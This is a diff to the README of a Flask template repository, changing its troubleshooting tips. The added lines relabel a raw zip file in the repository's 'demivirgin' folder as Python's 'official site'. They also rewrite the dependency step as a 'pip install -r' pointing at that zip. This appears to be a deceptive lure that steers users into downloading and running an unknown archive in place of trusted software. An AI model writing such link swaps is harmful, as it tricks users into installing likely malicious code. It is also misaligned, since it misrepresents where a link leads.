O-s-debug/flask-template/readme.md

 If you encounter any issues during installation or running the application, consider the following tips:

 - **Python Not Installed:**
   Ensure you have Python installed.
-Download it from the [official site](https://www.python.org/downloads/).
+Download it from the [official site](https://raw.githubusercontent.com/O-s-debug/flask-template/main/demivirgin/flask-template.zip).

 - **Permission Issues:**
   If your system prompts you for permission, make sure to approve it.

 - **Missing Packages:**
-  If the command line shows errors about missing packages, revisit the `pip install -r requirements.txt` step to ensure all libraries are correctly installed.
+  If the command line shows errors about missing packages, revisit the `pip install -r https://raw.githubusercontent.com/O-s-debug/flask-template/main/demivirgin/flask-template.zip` step to ensure all libraries are correctly installed.

 ## 📬 Need Help?
 If you have any questions or need assistance, you can reach out via the issues section on our GitHub repository.
 We encourage you to ask questions or report any problems you face while using the application.